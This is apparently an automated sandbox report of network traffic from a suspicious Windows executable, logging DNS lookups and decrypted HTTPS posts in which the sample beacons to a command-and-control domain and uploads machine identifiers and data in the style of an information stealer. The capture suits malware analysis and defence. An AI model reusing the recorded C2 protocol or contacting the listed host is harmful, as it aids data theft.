Jul 24, 2024 21:05:22.372898102 CEST	64748	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:22.372939110 CEST	443	64748	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:22.373089075 CEST	64748	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:22.373120070 CEST	443	64748	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:22.373276949 CEST	64748	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:22.373302937 CEST	443	64748	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:22.373449087 CEST	64748	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:22.373469114 CEST	443	64748	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:22.373476982 CEST	64748	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:22.373486996 CEST	443	64748	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:22.373626947 CEST	64748	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:22.373644114 CEST	443	64748	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:22.373668909 CEST	64748	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:22.373800993 CEST	64748	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:22.373819113 CEST	64748	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:22.384917021 CEST	443	64748	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:22.385127068 CEST	64748	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:22.385168076 CEST	64748	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:22.385191917 CEST	443	64748	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:22.385215044 CEST	64748	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:22.385245085 CEST	64748	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:22.385247946 CEST	443	64748	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:22.385276079 CEST	443	64748	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:23.908910036 CEST	443	64748	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:23.909157038 CEST	443	64748	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:23.909246922 CEST	64748	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:23.909856081 CEST	64748	443	192.168.2.5	172.67.163.54

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 24, 2024 21:04:49.332134962 CEST	56633	53	192.168.2.5	1.1.1.1
Jul 24, 2024 21:04:49.343168974 CEST	53	56633	1.1.1.1	192.168.2.5
Jul 24, 2024 21:05:12.626246929 CEST	56190	53	192.168.2.5	1.1.1.1
Jul 24, 2024 21:05:12.642108917 CEST	53	56190	1.1.1.1	192.168.2.5
Jul 24, 2024 21:05:18.154139996 CEST	53	61857	162.159.36.2	192.168.2.5
Jul 24, 2024 21:05:18.815685987 CEST	64558	53	192.168.2.5	1.1.1.1
Jul 24, 2024 21:05:18.825056076 CEST	53	64558	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 24, 2024 21:04:49.332134962 CEST	192.168.2.5	1.1.1.1	0x9431	Standard query (0)	qBnWsPFfTrJBhDSbGyd.qBnWsPFfTrJBhDSbGyd	A (IP address)	IN (0x0001)	false
Jul 24, 2024 21:05:12.626246929 CEST	192.168.2.5	1.1.1.1	0xf07e	Standard query (0)	assumptionflattyou.shop	A (IP address)	IN (0x0001)	false
Jul 24, 2024 21:05:18.815685987 CEST	192.168.2.5	1.1.1.1	0x5c05	Standard query (0)	198.187.3.20.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 24, 2024 21:04:49.343168974 CEST	1.1.1.1	192.168.2.5	0x9431	Name error (3)	qBnWsPFfTrJBhDSbGyd.qBnWsPFfTrJBhDSbGyd	none	none	A (IP address)	IN (0x0001)	false
Jul 24, 2024 21:05:12.642108917 CEST	1.1.1.1	192.168.2.5	0xf07e	No error (0)	assumptionflattyou.shop		172.67.163.54	A (IP address)	IN (0x0001)	false
Jul 24, 2024 21:05:12.642108917 CEST	1.1.1.1	192.168.2.5	0xf07e	No error (0)	assumptionflattyou.shop		104.21.66.182	A (IP address)	IN (0x0001)	false
Jul 24, 2024 21:05:18.825056076 CEST	1.1.1.1	192.168.2.5	0x5c05	Name error (3)	198.187.3.20.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

assumptionflattyou.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49731	172.67.163.54	443	6488	C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

Timestamp	Bytes transferred	Direction	Data
2024-07-24 19:05:13 UTC	270	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: assumptionflattyou.shop
2024-07-24 19:05:13 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-07-24 19:05:14 UTC	818	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 19:05:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2peq4pq5ti672bv6d5h9q7t05f; expires=Sun, 17-Nov-2024 12:51:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9aeu8MbG8ja1paFwL9z1Isu%2Bx7JBmFFFnXEh4c86cdJWRxR3nCZ2yC7MWjZvHpz%2FUXr8Z1zuuXGPbe68zytXx5uobWX%2Fe6y9MULeQH8o0%2FWe6RBpo%2BqFoJJ52XSUj1ZQ1h%2FICS8bwyn5RA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a862e32ee8d727d-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 19:05:14 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-07-24 19:05:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49733	172.67.163.54	443	6488	C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

Timestamp	Bytes transferred	Direction	Data
2024-07-24 19:05:14 UTC	271	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 57 Host: assumptionflattyou.shop
2024-07-24 19:05:14 UTC	57	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 40 5a 61 6b 69 65 6c 6b 26 6a 3d 64 65 66 61 75 6c 74 Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--@Zakielk&j=default
2024-07-24 19:05:15 UTC	812	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 19:05:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=scdv27p22salv2uct5r30uakkj; expires=Sun, 17-Nov-2024 12:51:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sgSTuZEPyiE48Uzwz7XFI0xyT07xcdDO2JgCoiH1luVzwKYjVHTNbj9iJq5%2FHWwqKiEn5fIjZsX91CBKWe1C7NCDSkBmTgkRYxHBeirKxFBqPddioIh5Xa58Qam7%2BPDDn7%2FsEMiTyXAVaw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a862e3c9be443c8-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 19:05:15 UTC	557	IN	Data Raw: 31 64 64 39 0d 0a 78 50 4e 4f 71 48 6f 6e 47 66 61 79 5a 62 74 73 39 53 39 39 50 2f 66 32 2b 32 35 65 57 45 4e 4f 46 32 46 6c 4c 79 30 55 49 44 43 2f 30 54 69 4b 51 42 4d 31 31 4d 45 41 6d 56 61 42 58 51 68 61 32 39 53 61 43 6e 78 69 4a 53 39 37 45 67 41 44 44 32 4a 4e 45 76 36 56 4c 38 51 4a 51 6a 58 55 31 78 32 5a 56 71 35 55 58 31 71 5a 31 4d 46 4d 4f 7a 49 68 4c 33 73 44 42 45 52 43 5a 45 78 54 72 4a 38 70 77 42 39 45 66 5a 66 65 43 4e 34 4a 6b 45 34 58 55 5a 36 62 6b 77 4e 38 64 47 45 72 62 55 4e 66 44 57 42 78 56 46 47 4a 6b 6a 33 44 57 46 6f 31 6a 5a 41 41 31 55 37 50 44 52 78 61 6c 5a 71 64 43 6a 55 77 4b 79 5a 7a 41 67 46 46 58 58 31 47 57 4b 79 52 4b 73 45 56 54 57 6d 61 31 41 2f 56 44 35 70 4f 58 78 50 56 6b 34 46 4d 5a 48 70 79 48 6e 59 53 46 Data Ascii: 1dd9xPNOqHonGfayZbts9S99P/f2+25eWENOF2FlLy0UIDC/0TiKQBM11MEAmVaBXQha29SaCnxiJS97EgADD2JNEv6VL8QJQjXU1x2ZVq5UX1qZ1MFMOzIhL3sDBERCZExTrJ8pwB9EfZfeCN4JkE4XUZ6bkwN8dGErbUNfDWBxVFGJkj3DWFo1jZAA1U7PDRxalZqdCjUwKyZzAgFFXX1GWKyRKsEVTWma1A/VD5pOXxPVk4FMZHpyHnYSF
2024-07-24 19:05:15 UTC	1369	IN	Data Raw: 59 52 56 47 30 30 78 6e 4a 46 6b 74 38 67 70 41 59 6c 78 66 58 53 68 4d 64 7a 64 53 58 43 54 4d 6f 49 44 35 77 44 52 56 42 53 6e 42 50 55 61 69 52 4b 63 30 56 53 33 32 54 30 77 2f 64 44 35 6c 42 46 56 36 52 6c 39 6c 43 66 44 30 35 62 43 31 44 4e 6b 35 4c 63 56 42 52 71 4e 45 7a 68 41 45 46 66 4a 69 51 58 35 6b 45 6b 55 41 57 56 70 4b 63 6c 52 34 33 4e 53 49 6c 63 67 55 4e 54 6b 64 38 52 46 79 6e 6c 69 6e 4e 43 6b 74 77 6d 64 4d 4e 33 30 37 5a 44 52 68 46 31 63 7a 5a 49 6a 38 72 4e 78 35 32 45 68 59 4e 55 44 68 62 45 71 47 64 62 4a 4a 59 54 48 4f 62 33 51 72 54 41 4a 4a 41 46 6c 79 55 6d 5a 38 48 50 54 49 70 4b 48 49 44 41 30 42 41 65 45 4a 63 72 70 51 6f 77 42 45 46 4e 64 54 58 48 35 6c 57 31 33 30 53 55 5a 36 59 32 7a 6b 2f 4e 43 38 72 59 30 4d 59 41 31 Data Ascii: YRVG00xnJFkt8gpAYlxfXShMdzdSXCTMoID5wDRVBSnBPUaiRKc0VS32T0w/dD5lBFV6Rl9lCfD05bC1DNk5LcVBRqNEzhAEFfJiQX5kEkUAWVpKclR43NSIlcgUNTkd8RFynlinNCktwmdMN307ZDRhF1czZIj8rNx52EhYNUDhbEqGdbJJYTHOb3QrTAJJAFlyUmZ8HPTIpKHIDA0BAeEJcrpQowBEFNdTXH5lW130SUZ6Y2zk/NC8rY0MYA1
2024-07-24 19:05:15 UTC	1369	IN	Data Raw: 72 35 77 72 78 78 4e 50 64 70 44 58 42 70 6c 41 31 30 6f 48 48 63 33 55 72 78 77 78 4e 67 38 6e 65 51 70 48 55 67 46 76 41 6c 57 71 30 58 53 4b 48 45 6c 7a 6e 74 38 4f 30 77 53 59 52 42 39 56 6e 4a 32 61 44 44 41 38 49 43 42 35 44 67 4a 4f 53 6e 74 48 55 71 71 57 4b 38 74 59 43 7a 75 54 79 45 65 42 54 71 64 41 45 31 61 5a 31 71 77 50 4d 6a 51 6d 4f 6a 55 63 53 56 51 50 63 55 34 53 2f 74 45 6a 79 78 56 50 63 4a 72 63 42 74 6b 4b 6c 45 63 66 55 70 43 53 6b 51 55 38 4b 43 59 6a 64 41 49 4d 52 6b 4a 34 52 31 4f 6a 6c 6d 79 45 57 45 4a 6a 31 49 68 48 39 43 65 74 44 51 41 54 6a 4e 53 65 41 48 78 69 59 53 68 2f 41 77 70 48 52 48 6c 42 56 61 69 52 49 63 41 4b 54 58 75 55 33 67 48 59 41 70 4a 4d 45 31 36 48 6d 4a 38 42 4f 6a 49 7a 62 44 74 44 41 46 55 50 4c 67 4a Data Ascii: r5wrxxNPdpDXBplA10oHHc3UrxwxNg8neQpHUgFvAlWq0XSKHElznt8O0wSYRB9VnJ2aDDA8ICB5DgJOSntHUqqWK8tYCzuTyEeBTqdAE1aZ1qwPMjQmOjUcSVQPcU4S/tEjyxVPcJrcBtkKlEcfUpCSkQU8KCYjdAIMRkJ4R1OjlmyEWEJj1IhH9CetDQATjNSeAHxiYSh/AwpHRHlBVaiRIcAKTXuU3gHYApJME16HmJ8BOjIzbDtDAFUPLgJ
2024-07-24 19:05:15 UTC	1369	IN	Data Raw: 38 63 65 53 58 47 64 32 41 48 57 42 34 56 4f 45 31 4f 53 6d 70 55 43 4d 54 41 69 49 54 56 4e 52 30 70 58 4e 68 6f 53 69 70 59 68 35 42 4e 4a 66 4e 54 50 53 63 42 4f 6b 45 46 66 42 64 57 59 6b 77 41 31 4f 69 67 70 66 51 67 4f 53 45 35 39 52 31 47 67 6e 43 50 44 43 6b 39 34 6d 74 4d 4c 31 51 69 57 54 67 31 56 6e 4e 54 58 54 44 73 69 59 58 51 31 49 67 6c 41 57 33 46 53 45 72 6e 66 4e 59 6f 66 53 54 76 4d 6b 41 54 59 41 5a 52 4d 45 6c 75 63 6e 4a 6b 4b 4f 54 55 73 49 6e 49 45 42 30 42 42 65 55 52 61 71 35 30 6e 78 42 46 44 65 35 58 61 52 35 64 4f 6b 46 56 66 42 64 57 6b 6d 67 77 38 49 57 45 7a 4f 78 70 48 53 6b 4d 32 47 68 4b 30 6d 79 58 4b 47 30 70 38 6b 4e 73 4c 33 41 75 59 54 68 5a 59 6e 4a 71 4c 42 54 49 79 4b 53 4e 77 43 41 64 41 52 58 70 43 55 65 62 66 Data Ascii: 8ceSXGd2AHWB4VOE1OSmpUCMTAiITVNR0pXNhoSipYh5BNJfNTPScBOkEFfBdWYkwA1OigpfQgOSE59R1GgnCPDCk94mtML1QiWTg1VnNTXTDsiYXQ1IglAW3FSErnfNYofSTvMkATYAZRMElucnJkKOTUsInIEB0BBeURaq50nxBFDe5XaR5dOkFVfBdWkmgw8IWEzOxpHSkM2GhK0myXKG0p8kNsL3AuYThZYnJqLBTIyKSNwCAdARXpCUebf
2024-07-24 19:05:15 UTC	1369	IN	Data Raw: 78 7a 6b 64 77 4d 31 77 69 46 53 78 42 55 6c 70 65 51 43 7a 51 32 4b 79 39 79 51 30 6b 4e 53 47 34 43 43 75 61 79 4f 39 6f 56 42 57 54 61 79 55 66 65 41 74 63 56 58 31 57 59 6e 4a 4d 49 4f 7a 63 6d 4b 6e 77 52 44 6b 68 42 64 6b 5a 5a 71 5a 63 6f 79 52 68 58 66 5a 44 59 42 4e 51 44 6d 55 34 62 48 64 76 55 6e 68 52 38 59 6d 45 65 65 41 30 63 51 6b 68 6e 53 42 4b 35 33 7a 57 4b 48 30 6b 37 7a 4a 41 44 31 78 79 63 54 42 52 57 6d 35 4f 57 43 54 59 36 4c 69 68 32 44 51 78 4d 54 48 35 50 58 36 69 62 4a 63 4d 66 53 58 2b 54 6b 45 6d 5a 43 59 38 4e 52 78 32 2b 74 62 51 67 4f 79 42 68 4d 7a 73 61 52 30 70 44 4e 68 6f 53 71 70 67 67 77 42 4e 43 63 5a 72 5a 43 64 49 63 68 55 34 62 58 70 79 58 6e 67 55 79 4f 69 59 70 65 77 51 47 52 6b 74 38 51 56 54 6d 33 32 7a 4e 41 Data Ascii: xzkdwM1wiFSxBUlpeQCzQ2Ky9yQ0kNSG4CCuayO9oVBWTayUfeAtcVX1WYnJMIOzcmKnwRDkhBdkZZqZcoyRhXfZDYBNQDmU4bHdvUnhR8YmEeeA0cQkhnSBK53zWKH0k7zJAD1xycTBRWm5OWCTY6Lih2DQxMTH5PX6ibJcMfSX+TkEmZCY8NRx2+tbQgOyBhMzsaR0pDNhoSqpggwBNCcZrZCdIchU4bXpyXngUyOiYpewQGRkt8QVTm32zNA
2024-07-24 19:05:15 UTC	1369	IN	Data Raw: 66 43 74 6f 49 6c 45 59 61 56 35 53 54 6b 51 45 75 4f 53 34 6a 63 51 4d 49 53 30 6c 33 54 56 53 68 6d 43 33 43 48 77 55 31 31 4e 63 66 6d 56 62 58 59 78 68 65 6b 64 53 47 51 69 56 36 4a 69 41 31 57 30 64 4e 52 58 78 49 58 4b 61 57 50 73 77 52 52 58 69 47 30 77 48 52 43 4a 74 42 45 6c 57 63 6c 4a 77 48 4d 54 45 73 4b 6e 55 49 42 67 30 42 4e 6b 56 4b 35 73 6c 73 2b 78 56 4c 66 35 72 54 46 39 35 4f 69 41 4d 47 48 5a 4b 59 32 56 52 38 4e 53 67 2b 63 67 59 50 52 45 39 34 53 31 75 68 6c 53 2f 4c 48 45 6c 30 6e 64 4d 50 32 41 61 59 54 68 39 57 6e 5a 36 59 41 6a 6c 36 62 32 78 79 47 30 63 56 44 31 6c 42 56 36 32 51 62 75 30 65 51 6e 66 55 7a 30 6e 41 54 70 42 42 58 77 58 56 6c 35 30 43 4e 54 55 6c 4a 6e 49 44 41 45 74 50 66 6b 6c 66 72 59 4d 70 78 42 31 45 65 35 Data Ascii: fCtoIlEYaV5STkQEuOS4jcQMIS0l3TVShmC3CHwU11NcfmVbXYxhekdSGQiV6JiA1W0dNRXxIXKaWPswRRXiG0wHRCJtBElWclJwHMTEsKnUIBg0BNkVK5sls+xVLf5rTF95OiAMGHZKY2VR8NSg+cgYPRE94S1uhlS/LHEl0ndMP2AaYTh9WnZ6YAjl6b2xyG0cVD1lBV62Qbu0eQnfUz0nATpBBXwXVl50CNTUlJnIDAEtPfklfrYMpxB1Ee5
2024-07-24 19:05:15 UTC	247	IN	Data Raw: 48 4a 46 4f 43 56 37 53 71 71 63 69 4f 7a 77 6b 4b 32 56 42 4b 55 5a 62 63 51 49 63 35 70 35 73 6b 69 45 46 4d 39 54 76 53 5a 6b 57 31 78 56 66 61 4a 61 61 6c 77 73 71 4b 32 77 43 63 67 55 43 53 6c 38 30 62 46 6d 79 6c 6d 79 45 57 45 4d 37 7a 49 42 4a 6d 51 71 47 44 55 63 4e 78 38 2f 4d 58 32 74 71 63 7a 4d 37 47 6b 64 62 44 79 34 51 48 4f 61 44 62 4a 4a 59 41 6e 69 47 77 67 48 61 47 4a 51 4b 49 57 4f 57 67 70 51 44 4e 7a 73 66 45 6c 73 4f 42 6b 35 42 4e 48 4e 45 71 34 45 76 7a 78 39 37 52 5a 72 58 45 39 34 41 6b 55 31 66 45 39 57 62 32 56 51 46 65 6d 6c 73 53 6b 31 48 56 51 38 75 41 6d 65 6c 6e 79 4c 4e 44 6c 51 32 74 38 59 4b 31 67 57 57 44 56 45 64 6b 39 54 42 58 48 4a 36 4a 54 30 31 57 31 63 66 46 43 4d 52 42 66 62 44 4d 0d 0a Data Ascii: HJFOCV7SqqciOzwkK2VBKUZbcQIc5p5skiEFM9TvSZkW1xVfaJaalwsqK2wCcgUCSl80bFmylmyEWEM7zIBJmQqGDUcNx8/MX2tqczM7GkdbDy4QHOaDbJJYAniGwgHaGJQKIWOWgpQDNzsfElsOBk5BNHNEq4Evzx97RZrXE94AkU1fE9Wb2VQFemlsSk1HVQ8uAmelnyLNDlQ2t8YK1gWWDVEdk9TBXHJ6JT01W1cfFCMRBfbDM
2024-07-24 19:05:15 UTC	1369	IN	Data Raw: 32 34 34 37 0d 0a 34 51 42 42 57 33 55 69 46 57 58 54 6f 55 4e 52 78 33 53 6d 70 51 4e 50 7a 51 69 50 6d 63 46 42 46 74 4d 4d 58 78 73 68 35 77 6e 78 68 56 4b 63 4b 72 75 4a 74 51 46 6d 30 41 51 56 71 75 71 6a 41 38 79 4e 43 59 36 5a 45 4e 4a 44 55 41 32 47 6d 76 6d 32 57 7a 31 56 67 56 6a 31 49 68 48 37 41 32 5a 51 78 68 4c 68 4e 6d 34 41 54 63 32 4c 43 4e 2b 51 30 6b 4e 53 54 59 61 41 75 6a 52 4b 4e 74 59 48 53 76 47 69 31 4b 4b 57 63 63 66 41 42 4f 4d 31 49 39 4d 5a 47 68 76 62 47 64 44 58 77 30 49 64 56 42 41 6f 4a 49 36 79 56 39 37 52 62 66 48 45 64 4d 56 31 57 73 59 54 4a 79 43 6c 42 34 43 42 41 38 68 64 41 41 4a 44 33 35 67 54 30 4b 6c 6c 43 76 30 4a 6b 74 38 67 4e 63 4a 33 77 37 58 41 31 39 53 31 63 79 67 54 48 52 36 48 6d 49 31 47 30 63 56 44 30 Data Ascii: 24474QBBW3UiFWXToUNRx3SmpQNPzQiPmcFBFtMMXxsh5wnxhVKcKruJtQFm0AQVquqjA8yNCY6ZENJDUA2Gmvm2Wz1VgVj1IhH7A2ZQxhLhNm4ATc2LCN+Q0kNSTYaAujRKNtYHSvGi1KKWccfABOM1I9MZGhvbGdDXw0IdVBAoJI6yV97RbfHEdMV1WsYTJyClB4CBA8hdAAJD35gT0KllCv0Jkt8gNcJ3w7XA19S1cygTHR6HmI1G0cVD0
2024-07-24 19:05:15 UTC	1369	IN	Data Raw: 72 77 72 4a 43 55 39 61 6d 63 41 41 35 7a 43 43 54 68 46 54 6b 6f 4b 49 54 48 4a 36 4c 6d 77 74 4f 6b 63 46 41 33 42 42 52 4f 61 75 59 6f 6f 41 42 53 50 55 35 51 54 58 41 4a 42 62 44 68 43 7a 6c 34 67 47 48 54 63 78 4b 7a 56 4e 52 30 73 50 4c 68 45 63 35 70 55 39 69 6b 41 56 4b 63 2b 46 56 49 35 65 78 56 4a 52 52 4e 57 43 32 56 52 75 64 47 45 2b 4e 56 74 48 43 6b 78 6b 55 46 53 6c 68 79 2b 4e 4a 6e 74 4f 6c 39 34 4a 33 68 69 69 54 67 35 65 6c 5a 2b 6e 4d 68 30 30 4b 69 74 35 46 54 6c 7a 65 6e 56 4d 58 4b 47 48 50 59 70 57 42 58 54 55 69 44 36 5a 52 74 64 79 55 52 32 4e 31 4d 46 4d 43 54 6b 76 49 6e 49 56 46 67 42 36 64 56 4e 52 70 70 70 73 68 46 68 44 4f 38 79 43 53 5a 6b 4b 68 67 31 48 44 63 66 50 7a 46 39 72 61 6e 4d 7a 4f 78 70 48 57 77 38 75 45 42 7a Data Ascii: rwrJCU9amcAA5zCCThFTkoKITHJ6LmwtOkcFA3BBROauYooABSPU5QTXAJBbDhCzl4gGHTcxKzVNR0sPLhEc5pU9ikAVKc+FVI5exVJRRNWC2VRudGE+NVtHCkxkUFSlhy+NJntOl94J3hiiTg5elZ+nMh00Kit5FTlzenVMXKGHPYpWBXTUiD6ZRtdyUR2N1MFMCTkvInIVFgB6dVNRpppshFhDO8yCSZkKhg1HDcfPzF9ranMzOxpHWw8uEBz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49735	172.67.163.54	443	6488	C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

Timestamp	Bytes transferred	Direction	Data
2024-07-24 19:05:16 UTC	289	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 13683 Host: assumptionflattyou.shop
2024-07-24 19:05:16 UTC	13683	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 32 31 46 35 37 46 45 35 34 35 43 39 31 38 39 34 32 43 32 44 43 30 30 33 45 30 33 44 36 31 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 5a 61 6b 69 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A21F57FE545C918942C2DC003E03D613--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--@Zaki
2024-07-24 19:05:16 UTC	812	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 19:05:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=c3v90c9omo9l418pgmjtt30ngu; expires=Sun, 17-Nov-2024 12:51:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Vhc9AIQ82homXfykS2RyWexoakG0jCfwMBDRT96K27DLrmuGhFWpibhmpOhYxV5CD%2FQOWNibVCxqXDSNIZzfiL0pajEES8L08%2FDoB3I64iCg%2BcSgBdjiCJdST1daabR2qZhW74X7INYdg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a862e447aa75e62-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 19:05:16 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-24 19:05:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49736	172.67.163.54	443	6488	C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

Timestamp	Bytes transferred	Direction	Data
2024-07-24 19:05:17 UTC	289	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 16226 Host: assumptionflattyou.shop
2024-07-24 19:05:17 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 32 31 46 35 37 46 45 35 34 35 43 39 31 38 39 34 32 43 32 44 43 30 30 33 45 30 33 44 36 31 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 5a 61 6b 69 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A21F57FE545C918942C2DC003E03D613--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--@Zaki
